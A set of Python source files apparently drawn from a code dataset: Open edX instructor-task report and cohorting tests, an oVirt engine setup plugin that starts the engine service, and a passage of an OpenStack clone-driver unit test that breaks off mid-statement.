                    self.student_b.username, u'0.5', u'N/A', u'N/A', u'1.0', u'2.0'
                ]
            ))
        ])
class TestProblemReportCohortedContent(TestReportMixin, ContentGroupTestCase, InstructorTaskModuleTestCase):
    """
    Test the problem report on a course that has cohorted content.
    """
    def setUp(self):
        super(TestProblemReportCohortedContent, self).setUp()
        # construct cohorted problems to work on.
        self.add_course_content()
        vertical = ItemFactory.create(
            parent_location=self.problem_section.location,
            category='vertical',
            metadata={'graded': True},
            display_name='Problem Vertical'
        )
        # Pröblem0 is restricted to the first partition group (alpha),
        # Pröblem1 to the second (beta).
        self.define_option_problem(
            u"Pröblem0",
            parent=vertical,
            group_access={self.course.user_partitions[0].id: [self.course.user_partitions[0].groups[0].id]}
        )
        self.define_option_problem(
            u"Pröblem1",
            parent=vertical,
            group_access={self.course.user_partitions[0].id: [self.course.user_partitions[0].groups[1].id]}
        )

    def test_cohort_content(self):
        # Submitting against a problem outside the user's cohort 404s.
        self.submit_student_answer(self.alpha_user.username, u'Pröblem0', ['Option 1', 'Option 1'])
        resp = self.submit_student_answer(self.alpha_user.username, u'Pröblem1', ['Option 1', 'Option 1'])
        self.assertEqual(resp.status_code, 404)
        resp = self.submit_student_answer(self.beta_user.username, u'Pröblem0', ['Option 1', 'Option 2'])
        self.assertEqual(resp.status_code, 404)
        self.submit_student_answer(self.beta_user.username, u'Pröblem1', ['Option 1', 'Option 2'])
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_problem_grade_report(None, None, self.course.id, None, 'graded')
            self.assertDictContainsSubset(
                {'action_name': 'graded', 'attempted': 4, 'succeeded': 4, 'failed': 0}, result
            )
        problem_names = [u'Homework 1: Problem - Pröblem0', u'Homework 1: Problem - Pröblem1']
        header_row = [u'Student ID', u'Email', u'Username', u'Final Grade']
        for problem in problem_names:
            header_row += [problem + ' (Earned)', problem + ' (Possible)']
        self.verify_rows_in_csv([
            dict(zip(
                header_row,
                [
                    unicode(self.staff_user.id),
                    self.staff_user.email,
                    self.staff_user.username, u'0.0', u'N/A', u'N/A', u'N/A', u'N/A'
                ]
            )),
            dict(zip(
                header_row,
                [
                    unicode(self.alpha_user.id),
                    self.alpha_user.email,
                    self.alpha_user.username,
                    u'1.0', u'2.0', u'2.0', u'N/A', u'N/A'
                ]
            )),
            dict(zip(
                header_row,
                [
                    unicode(self.beta_user.id),
                    self.beta_user.email,
                    self.beta_user.username,
                    u'0.5', u'N/A', u'N/A', u'1.0', u'2.0'
                ]
            )),
            dict(zip(
                header_row,
                [
                    unicode(self.non_cohorted_user.id),
                    self.non_cohorted_user.email,
                    self.non_cohorted_user.username,
                    u'0.0', u'N/A', u'N/A', u'N/A', u'N/A'
                ]
            )),
        ])
@ddt.ddt
class TestExecutiveSummaryReport(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that Executive Summary report generation works.

    Sets up a paid course mode, an invoice with a completed transaction, and
    a batch of coupons, then verifies the generated HTML report figures.
    """
    def setUp(self):
        super(TestExecutiveSummaryReport, self).setUp()
        self.course = CourseFactory.create()
        CourseModeFactory.create(course_id=self.course.id, min_price=50)
        self.instructor = InstructorFactory(course_key=self.course.id)
        self.student1 = UserFactory()
        self.student2 = UserFactory()
        self.student1_cart = Order.get_cart_for_user(self.student1)
        self.student2_cart = Order.get_cart_for_user(self.student2)
        self.sale_invoice_1 = Invoice.objects.create(
            total_amount=1234.32, company_name='Test1', company_contact_name='TestName',
            company_contact_email='Test@company.com',
            recipient_name='Testw', recipient_email='test1@test.com', customer_reference_number='2Fwe23S',
            internal_reference="A", course_id=self.course.id, is_valid=True
        )
        InvoiceTransaction.objects.create(
            invoice=self.sale_invoice_1,
            amount=self.sale_invoice_1.total_amount,
            status='completed',
            created_by=self.instructor,
            last_modified_by=self.instructor
        )
        self.invoice_item = CourseRegistrationCodeInvoiceItem.objects.create(
            invoice=self.sale_invoice_1,
            qty=10,
            unit_price=1234.32,
            course_id=self.course.id
        )
        # Create five active coupons (coupon0..coupon4) with 0-4% discounts.
        for i in range(5):
            coupon = Coupon(
                code='coupon{0}'.format(i), description='test_description', course_id=self.course.id,
                percentage_discount='{0}'.format(i), created_by=self.instructor, is_active=True,
            )
            coupon.save()

    def test_successfully_generate_executive_summary_report(self):
        """
        Test that successfully generates the executive summary report.
        """
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_exec_summary_report(
                None, None, self.course.id,
                task_input, 'generating executive summary report'
            )
        # NOTE(review): return value unused — call presumably kept only to
        # exercise report-store configuration; confirm or drop.
        ReportStore.from_config(config_name='FINANCIAL_REPORTS')
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)

    def students_purchases(self):
        """
        Students purchases the courses using enrollment
        and coupon codes.
        """
        self.client.login(username=self.student1.username, password='test')
        paid_course_reg_item = PaidCourseRegistration.add_to_order(self.student1_cart, self.course.id)
        # update the quantity of the cart item paid_course_reg_item
        resp = self.client.post(reverse('shoppingcart.views.update_user_cart'), {
            'ItemId': paid_course_reg_item.id, 'qty': '4'
        })
        self.assertEqual(resp.status_code, 200)
        # apply the coupon code to the item in the cart
        resp = self.client.post(reverse('shoppingcart.views.use_code'), {'code': 'coupon1'})
        self.assertEqual(resp.status_code, 200)
        self.student1_cart.purchase()
        course_reg_codes = CourseRegistrationCode.objects.filter(order=self.student1_cart)
        redeem_url = reverse('register_code_redemption', args=[course_reg_codes[0].code])
        response = self.client.get(redeem_url)
        self.assertEquals(response.status_code, 200)
        # check button text
        self.assertTrue('Activate Course Enrollment' in response.content)
        response = self.client.post(redeem_url)
        self.assertEquals(response.status_code, 200)
        self.client.login(username=self.student2.username, password='test')
        PaidCourseRegistration.add_to_order(self.student2_cart, self.course.id)
        # apply the coupon code to the item in the cart
        resp = self.client.post(reverse('shoppingcart.views.use_code'), {'code': 'coupon1'})
        self.assertEqual(resp.status_code, 200)
        self.student2_cart.purchase()

    @patch.dict('django.conf.settings.FEATURES', {'ENABLE_PAID_COURSE_REGISTRATION': True})
    def test_generate_executive_summary_report(self):
        """
        test to generate executive summary report
        and then test the report authenticity.
        """
        self.students_purchases()
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_exec_summary_report(
                None, None, self.course.id,
                task_input, 'generating executive summary report'
            )
        report_store = ReportStore.from_config(config_name='FINANCIAL_REPORTS')
        expected_data = [
            'Gross Revenue Collected', '$1481.82',
            'Gross Revenue Pending', '$0.00',
            'Average Price per Seat', '$296.36',
            'Number of seats purchased using coupon codes', '<td>2</td>'
        ]
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)
        self._verify_html_file_report(report_store, expected_data)

    def _verify_html_file_report(self, report_store, expected_data):
        """
        Verify grade report data.

        Asserts each string in *expected_data* appears somewhere in the
        latest HTML report stored for this course.
        """
        report_html_filename = report_store.links_for(self.course.id)[0][0]
        with open(report_store.path_to(self.course.id, report_html_filename)) as html_file:
            html_file_data = html_file.read()
            for data in expected_data:
                self.assertTrue(data in html_file_data)
@ddt.ddt
class TestStudentReport(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that CSV student profile report generation works.
    """
    def setUp(self):
        super(TestStudentReport, self).setUp()
        self.course = CourseFactory.create()

    def test_success(self):
        """A single enrolled student yields one report link and a fully successful result."""
        self.create_student('student', 'student@example.com')
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
        report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
        links = report_store.links_for(self.course.id)
        # Use assertEqual rather than the deprecated assertEquals alias.
        self.assertEqual(len(links), 1)
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)

    @ddt.data([u'student', u'student\xec'])
    def test_unicode_usernames(self, students):
        """
        Test that students with unicode characters in their usernames
        are handled.
        """
        for i, student in enumerate(students):
            self.create_student(username=student, email='student{0}@example.com'.format(i))
        self.current_task = Mock()
        self.current_task.update_state = Mock()
        task_input = {
            'features': [
                'id', 'username', 'name', 'email', 'language', 'location',
                'year_of_birth', 'gender', 'level_of_education', 'mailing_address',
                'goals'
            ]
        }
        with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
            mock_current_task.return_value = self.current_task
            result = upload_students_csv(None, None, self.course.id, task_input, 'calculated')
        # This assertion simply confirms that the generation completed with no errors
        num_students = len(students)
        self.assertDictContainsSubset({'attempted': num_students, 'succeeded': num_students, 'failed': 0}, result)
@ddt.ddt
class TestListMayEnroll(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that generation of CSV files containing information about
    students who may enroll in a given course (but have not signed up
    for it yet) works.
    """
    def _create_enrollment(self, email):
        """Factory method for creating CourseEnrollmentAllowed objects."""
        return CourseEnrollmentAllowed.objects.create(
            email=email, course_id=self.course.id
        )

    def setUp(self):
        super(TestListMayEnroll, self).setUp()
        self.course = CourseFactory.create()

    def test_success(self):
        """A single allowed enrollment yields one report link and a successful result."""
        self._create_enrollment('user@example.com')
        task_input = {'features': []}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_may_enroll_csv(None, None, self.course.id, task_input, 'calculated')
        report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
        links = report_store.links_for(self.course.id)
        # Use assertEqual rather than the deprecated assertEquals alias.
        self.assertEqual(len(links), 1)
        self.assertDictContainsSubset({'attempted': 1, 'succeeded': 1, 'failed': 0}, result)

    def test_unicode_email_addresses(self):
        """
        Test handling of unicode characters in email addresses of students
        who may enroll in a course.
        """
        enrollments = [u'student@example.com', u'ni\xf1o@example.com']
        for email in enrollments:
            self._create_enrollment(email)
        task_input = {'features': ['email']}
        with patch('instructor_task.tasks_helper._get_current_task'):
            result = upload_may_enroll_csv(None, None, self.course.id, task_input, 'calculated')
        # This assertion simply confirms that the generation completed with no errors
        num_enrollments = len(enrollments)
        self.assertDictContainsSubset({'attempted': num_enrollments, 'succeeded': num_enrollments, 'failed': 0}, result)
class MockDefaultStorage(object):
    """Stand-in for django's DefaultStorage that reads from the local filesystem."""

    def __init__(self):
        # No state to set up; present only to mirror DefaultStorage's interface.
        pass

    def open(self, file_name):
        """Mock out DefaultStorage.open with standard python open"""
        handle = open(file_name)
        return handle
@patch('instructor_task.tasks_helper.DefaultStorage', new=MockDefaultStorage)
class TestCohortStudents(TestReportMixin, InstructorTaskCourseTestCase):
    """
    Tests that bulk student cohorting works.

    Each test feeds a small CSV (username,email,cohort) to the task and then
    checks both the returned result counts and the results CSV that the task
    uploads (columns in ``csv_header_row``).
    """
    def setUp(self):
        super(TestCohortStudents, self).setUp()
        self.course = CourseFactory.create()
        self.cohort_1 = CohortFactory(course_id=self.course.id, name='Cohort 1')
        self.cohort_2 = CohortFactory(course_id=self.course.id, name='Cohort 2')
        # One username contains a non-ASCII character to exercise unicode handling.
        self.student_1 = self.create_student(username=u'student_1\xec', email='student_1@example.com')
        self.student_2 = self.create_student(username='student_2', email='student_2@example.com')
        # Column headers of the results CSV produced by the cohorting task.
        self.csv_header_row = ['Cohort Name', 'Exists', 'Students Added', 'Students Not Found']

    def _cohort_students_and_upload(self, csv_data):
        """
        Call `cohort_students_and_upload` with a file generated from `csv_data`.
        """
        with tempfile.NamedTemporaryFile() as temp_file:
            temp_file.write(csv_data.encode('utf-8'))
            temp_file.flush()
            with patch('instructor_task.tasks_helper._get_current_task'):
                return cohort_students_and_upload(None, None, self.course.id, {'file_name': temp_file.name}, 'cohorted')

    def test_username(self):
        # Students identified by username only.
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,,Cohort 1\n'
            u'student_2,,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_email(self):
        # Students identified by email only.
        result = self._cohort_students_and_upload(
            'username,email,cohort\n'
            ',student_1@example.com,Cohort 1\n'
            ',student_2@example.com,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_username_and_email(self):
        # Both identifiers supplied for each row.
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,student_1@example.com,Cohort 1\n'
            u'student_2,student_2@example.com,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_prefer_email(self):
        """
        Test that `cohort_students_and_upload` greedily prefers 'email' over
        'username' when identifying the user. This means that if a correct
        email is present, an incorrect or non-matching username will simply be
        ignored.
        """
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,student_1@example.com,Cohort 1\n'  # valid username and email
            u'Invalid,student_2@example.com,Cohort 2'          # invalid username, valid email
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_non_existent_user(self):
        # Neither row matches a real user: the identifier used is echoed back
        # in the 'Students Not Found' column.
        result = self._cohort_students_and_upload(
            'username,email,cohort\n'
            'Invalid,,Cohort 1\n'
            'student_2,also_fake@bad.com,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 0, 'failed': 2}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '0', 'Invalid'])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '0', 'also_fake@bad.com'])),
            ],
            verify_order=False
        )

    def test_non_existent_cohort(self):
        # The first row names a cohort that does not exist ('Exists' == False).
        result = self._cohort_students_and_upload(
            'username,email,cohort\n'
            ',student_1@example.com,Does Not Exist\n'
            'student_2,,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 1, 'failed': 1}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Does Not Exist', 'False', '0', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_too_few_commas(self):
        """
        A CSV file may be malformed and lack trailing commas at the end of a row.
        In this case, those cells take on the value None by the CSV parser.
        Make sure we handle None values appropriately.
        i.e.:
            header_1,header_2,header_3
            val_1,val_2,val_3  <- good row
            val_1,,  <- good row
            val_1    <- bad row; no trailing commas to indicate empty rows
        """
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,\n'
            u'student_2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 0, 'failed': 2}, result)
        self.verify_rows_in_csv(
            [
                # Both malformed rows collapse into a single empty-cohort row.
                dict(zip(self.csv_header_row, ['', 'False', '0', ''])),
            ],
            verify_order=False
        )

    def test_only_header_row(self):
        # A header-only file is a no-op: nothing attempted, empty results CSV.
        result = self._cohort_students_and_upload(
            u'username,email,cohort'
        )
        self.assertDictContainsSubset({'total': 0, 'attempted': 0, 'succeeded': 0, 'failed': 0}, result)
        self.verify_rows_in_csv([])

    def test_carriage_return(self):
        """
        Test that we can handle carriage returns in our file.
        """
        result = self._cohort_students_and_upload(
            u'username,email,cohort\r'
            u'student_1\xec,,Cohort 1\r'
            u'student_2,,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_carriage_return_line_feed(self):
        """
        Test that we can handle carriage returns and line feeds in our file.
        """
        result = self._cohort_students_and_upload(
            u'username,email,cohort\r\n'
            u'student_1\xec,,Cohort 1\r\n'
            u'student_2,,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_move_users_to_new_cohort(self):
        # Students already cohorted can be moved to a different cohort.
        self.cohort_1.users.add(self.student_1)
        self.cohort_2.users.add(self.student_2)
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,,Cohort 2\n'
            u'student_2,,Cohort 1'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'succeeded': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '1', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '1', ''])),
            ],
            verify_order=False
        )

    def test_move_users_to_same_cohort(self):
        # Re-assigning a student to their current cohort counts as 'skipped',
        # not 'succeeded', and adds 0 students in the results CSV.
        self.cohort_1.users.add(self.student_1)
        self.cohort_2.users.add(self.student_2)
        result = self._cohort_students_and_upload(
            u'username,email,cohort\n'
            u'student_1\xec,,Cohort 1\n'
            u'student_2,,Cohort 2'
        )
        self.assertDictContainsSubset({'total': 2, 'attempted': 2, 'skipped': 2, 'failed': 0}, result)
        self.verify_rows_in_csv(
            [
                dict(zip(self.csv_header_row, ['Cohort 1', 'True', '0', ''])),
                dict(zip(self.csv_header_row, ['Cohort 2', 'True', '0', ''])),
            ],
            verify_order=False
        )
@ddt.ddt
@patch('instructor_task.tasks_helper.DefaultStorage', new=MockDefaultStorage)
class TestGradeReportEnrollmentAndCertificateInfo(TestReportMixin, InstructorTaskModuleTestCase):
    """
    Test that grade report has correct user enrolment, verification, and certificate information.
    """
    def setUp(self):
        super(TestGradeReportEnrollmentAndCertificateInfo, self).setUp()
        self.initialize_course()
        self.create_problem()
        # Columns of the grade report CSV that these tests inspect.
        self.columns_to_check = [
            'Enrollment Track',
            'Verification Status',
            'Certificate Eligible',
            'Certificate Delivered',
            'Certificate Type'
        ]

    def create_problem(self, problem_display_name='test_problem', parent=None):
        """
        Create a multiple choice response problem.

        The second choice ('choice_1') is the correct one, so submitting it
        marks the student as having passed the problem.
        """
        if parent is None:
            parent = self.problem_section
        factory = MultipleChoiceResponseXMLFactory()
        args = {'choices': [False, True, False]}
        problem_xml = factory.build_xml(**args)
        ItemFactory.create(
            parent_location=parent.location,
            parent=parent,
            category="problem",
            display_name=problem_display_name,
            data=problem_xml
        )

    def user_is_embargoed(self, user, is_embargoed):
        """
        Set a user's embargo state.
        """
        # NOTE(review): UserFactory is invoked with an existing user's
        # username/email to obtain a profile — presumably it get-or-creates;
        # verify it does not create a duplicate user.
        user_profile = UserFactory(username=user.username, email=user.email).profile
        user_profile.allow_certificate = not is_embargoed
        user_profile.save()

    def _verify_csv_data(self, username, expected_data):
        """
        Verify grade report data.

        Generates a fresh grade report and asserts that the row for
        ``username`` contains ``expected_data`` in ``columns_to_check`` order.
        """
        with patch('instructor_task.tasks_helper._get_current_task'):
            upload_grades_csv(None, None, self.course.id, None, 'graded')
            report_store = ReportStore.from_config(config_name='GRADES_DOWNLOAD')
            report_csv_filename = report_store.links_for(self.course.id)[0][0]
            with open(report_store.path_to(self.course.id, report_csv_filename)) as csv_file:
                for row in unicodecsv.DictReader(csv_file):
                    if row.get('username') == username:
                        csv_row_data = [row[column] for column in self.columns_to_check]
                        self.assertEqual(csv_row_data, expected_data)

    def _create_user_data(self,
                          user_enroll_mode,
                          has_passed,
                          whitelisted,
                          is_embargoed,
                          verification_status,
                          certificate_status,
                          certificate_mode):
        """
        Create user data to be used during grade report generation.
        """
        user = self.create_student('u1', mode=user_enroll_mode)
        if has_passed:
            # Submit the correct answer (see create_problem) to pass.
            self.submit_student_answer('u1', 'test_problem', ['choice_1'])
        CertificateWhitelistFactory.create(user=user, course_id=self.course.id, whitelist=whitelisted)
        self.user_is_embargoed(user, is_embargoed)
        # Photo verification only applies to verified-track enrollments.
        if user_enroll_mode in CourseMode.VERIFIED_MODES:
            SoftwareSecurePhotoVerificationFactory.create(user=user, status=verification_status)
        GeneratedCertificateFactory.create(
            user=user,
            course_id=self.course.id,
            status=certificate_status,
            mode=certificate_mode
        )
        return user

    @ddt.data(
        (
            'verified', False, False, False, 'approved', 'notpassing', 'honor',
            ['verified', 'ID Verified', 'N', 'N', 'N/A']
        ),
        (
            'verified', False, True, False, 'approved', 'downloadable', 'verified',
            ['verified', 'ID Verified', 'Y', 'Y', 'verified']
        ),
        (
            'honor', True, True, True, 'approved', 'restricted', 'honor',
            ['honor', 'N/A', 'N', 'N', 'N/A']
        ),
        (
            'verified', True, True, False, 'must_retry', 'downloadable', 'honor',
            ['verified', 'Not ID Verified', 'Y', 'Y', 'honor']
        ),
    )
    @ddt.unpack
    def test_grade_report_enrollment_and_certificate_info(
            self,
            user_enroll_mode,
            has_passed,
            whitelisted,
            is_embargoed,
            verification_status,
            certificate_status,
            certificate_mode,
            expected_output
    ):
        # Build a user in the given state, then check the report row for them.
        user = self._create_user_data(
            user_enroll_mode,
            has_passed,
            whitelisted,
            is_embargoed,
            verification_status,
            certificate_status,
            certificate_mode
        )
        self._verify_csv_data(user.username, expected_output)
@override_settings(CERT_QUEUE='test-queue')
class TestCertificateGeneration(InstructorTaskModuleTestCase):
    """
    Test certificate generation task works.
    """
    def setUp(self):
        super(TestCertificateGeneration, self).setUp()
        self.initialize_course()

    def test_certificate_generation_for_students(self):
        """
        Verify that certificates generated for all eligible students enrolled in a course.

        Expected accounting for the 10 students created below:
          * 2 already hold downloadable certificates -> skipped;
          * 8 attempted, of which the 5 white-listed ones succeed and the
            remaining 3 fail.
        """
        # create 10 students
        students = [self.create_student(username='student_{}'.format(i), email='student_{}@example.com'.format(i))
                    for i in xrange(1, 11)]
        # mark 2 students to have certificates generated already
        for student in students[:2]:
            GeneratedCertificateFactory.create(
                user=student,
                course_id=self.course.id,
                status=CertificateStatuses.downloadable,
                mode='honor'
            )
        # white-list 5 students
        for student in students[2:7]:
            CertificateWhitelistFactory.create(user=student, course_id=self.course.id, whitelist=True)
        current_task = Mock()
        current_task.update_state = Mock()
        # Pin the query count to catch accidental N+1 regressions in the task.
        with self.assertNumQueries(104):
            with patch('instructor_task.tasks_helper._get_current_task') as mock_current_task:
                mock_current_task.return_value = current_task
                with patch('capa.xqueue_interface.XQueueInterface.send_to_queue') as mock_queue:
                    mock_queue.return_value = (0, "Successfully queued")
                    result = generate_students_certificates(None, None, self.course.id, None, 'certificates generated')
        self.assertDictContainsSubset(
            {
                'action_name': 'certificates generated',
                'total': 10,
                'attempted': 8,
                'succeeded': 5,
                'failed': 3,
                'skipped': 2
            },
            result
        )
| agpl-3.0 |
yingyun001/ovirt-engine | packaging/setup/plugins/ovirt-engine-rename/ovirt-engine/engine.py | 8 | 1604 |
#
# ovirt-engine-setup -- ovirt engine setup
# Copyright (C) 2013-2015 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Misc plugin."""
import gettext
from otopi import plugin, util
from ovirt_engine_setup import constants as osetupcons
from ovirt_engine_setup.engine import constants as oenginecons
from ovirt_engine_setup.engine_common import constants as oengcommcons
def _(m):
return gettext.dgettext(message=m, domain='ovirt-engine-setup')
@util.export
class Plugin(plugin.PluginBase):
    """Engine service start plugin: starts ovirt-engine at close-up."""

    def __init__(self, context):
        super(Plugin, self).__init__(context=context)

    @plugin.event(
        stage=plugin.Stages.STAGE_CLOSEUP,
        name=oengcommcons.Stages.CORE_ENGINE_START,
        # Skip starting the service for developer-mode installations.
        condition=lambda self: not self.environment[
            osetupcons.CoreEnv.DEVELOPER_MODE
        ],
    )
    def _closeup(self):
        # Ensure the engine service is running when setup finishes.
        self.logger.info(_('Starting engine service'))
        self.services.state(
            name=oenginecons.Const.ENGINE_SERVICE_NAME,
            state=True,
        )
# vim: expandtab tabstop=4 shiftwidth=4
| apache-2.0 |
Hybrid-Cloud/conveyor | conveyor/tests/unit/clone/drivers/openstack/test_driver.py | 1 | 5751 | # Copyright 2016 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from conveyor.clone.drivers import driver as base_driver
from conveyor.clone.drivers.openstack import driver
from conveyor.clone.resources import common
from conveyor.common import config
from conveyor.conveyoragentclient.v1 import client as birdiegatewayclient
from conveyor.conveyorheat.api import api
from conveyor.resource import resource
from conveyor.tests import test
from conveyor.tests.unit import fake_constants
from conveyor import context
from conveyor import utils
CONF = config.CONF
class OpenstackDriverTestCase(test.TestCase):
    """Unit tests for the OpenStack clone driver (conveyor.clone.drivers.openstack)."""

    def setUp(self):
        super(OpenstackDriverTestCase, self).setUp()
        self.context = context.RequestContext('fake', 'fake', is_admin=False)
        self.manager = driver.OpenstackDriver()

    def test_handle_resources(self):
        # Placeholder: handle_resources is not yet covered.
        pass

    @mock.patch.object(base_driver.BaseDriver, '_handle_dv_for_svm')
    def test_add_extra_properties_for_server(self, mock_svm):
        # Server without a gw_url extra property: the driver must pick a
        # gateway via utils.get_next_vgw and complete without error.
        template = fake_constants.FAKE_INSTANCE_TEMPLATE['template']
        template['resources']['server_0']['extra_properties'].pop('gw_url')
        res_map = {}
        for key, value in template['resources'].items():
            res_map[key] = resource.Resource.from_dict(value)
        undo_mgr = utils.UndoManager()
        utils.get_next_vgw = mock.MagicMock()
        utils.get_next_vgw.return_value = ('123', '10.0.0.1')
        self.assertEqual(
            None,
            self.manager.add_extra_properties_for_server(
                self.context, res_map['server_0'], res_map,
                False, True, undo_mgr))

    @mock.patch.object(base_driver.BaseDriver, '_handle_dv_for_svm')
    def test_add_extra_properties_for_server_with_active(self, mock_svm):
        # Same as above, but the server is in 'active' vm_state.
        template = fake_constants.FAKE_INSTANCE_TEMPLATE['template']
        template['resources']['server_0']['extra_properties'].pop('gw_url')
        template['resources']['server_0']['extra_properties']['vm_state'] = \
            'active'
        res_map = {}
        for key, value in template['resources'].items():
            res_map[key] = resource.Resource.from_dict(value)
        undo_mgr = utils.UndoManager()
        utils.get_next_vgw = mock.MagicMock()
        utils.get_next_vgw.return_value = ('123', '10.0.0.1')
        self.assertEqual(
            None,
            self.manager.add_extra_properties_for_server(
                self.context, res_map['server_0'], res_map,
                False, True, undo_mgr))

    def test_add_extra_properties_for_stack(self):
        # Stack resource backed by an active server: heat and nova calls are
        # stubbed so only the driver's own logic runs.
        undo_mgr = utils.UndoManager()
        template = fake_constants.FAKE_PLAN['updated_resources']
        stack = resource.Resource.from_dict(template['stack_0'])
        self.manager.heat_api.get_resource = mock.MagicMock()
        self.manager.heat_api.get_resource.return_value = \
            api.Resource(api.format_resource(fake_constants.FAKE_RESOURCE))
        self.manager.compute_api.get_server = mock.MagicMock()
        self.manager.compute_api.get_server.return_value = \
            {'OS-EXT-STS:vm_state': 'active'}
        self.assertEqual(
            None,
            self.manager.add_extra_properties_for_stack(
                self.context, stack, False, True, undo_mgr
            ))

    @mock.patch.object(base_driver.BaseDriver, '_wait_for_volume_status')
    @mock.patch.object(birdiegatewayclient, 'get_birdiegateway_client')
    def test_handle_server_after_clone(self, mock_client, mock_wait):
        # With sys_clone enabled, post-clone handling detaches/re-attaches the
        # system volume; every external call is mocked to return None.
        template = \
            fake_constants.FAKE_INSTANCE_TEMPLATE['template']['resources']
        template['volume_1']['extra_properties']['sys_clone'] = True
        self.manager.compute_api.migrate_interface_detach = mock.MagicMock()
        self.manager.compute_api.migrate_interface_detach.return_value = None
        mock_client.return_value = birdiegatewayclient.Client()
        mock_client.return_value.vservices._force_umount_disk = \
            mock.MagicMock()
        mock_client.return_value.vservices._force_umount_disk.return_value = \
            None
        self.manager.compute_api.stop_server = mock.MagicMock()
        self.manager.compute_api.stop_server.return_value = None
        self.manager.compute_api.detach_volume = mock.MagicMock()
        self.manager.compute_api.detach_volume.return_value = None
        common.ResourceCommon._await_instance_status = mock.MagicMock()
        common.ResourceCommon._await_instance_status.return_value = None
        self.manager.compute_api.attach_volume = mock.MagicMock()
        self.manager.compute_api.attach_volume.return_value = None
        self.manager.compute_api.start_server = mock.MagicMock()
        self.manager.compute_api.start_server.return_value = None
        self.assertEqual(
            None,
            self.manager.handle_server_after_clone(
                self.context, template['server_0'], template
            ))

    def test_handle_stack_after_clone(self):
        # Stack post-clone handling with no dependent resources.
        template = \
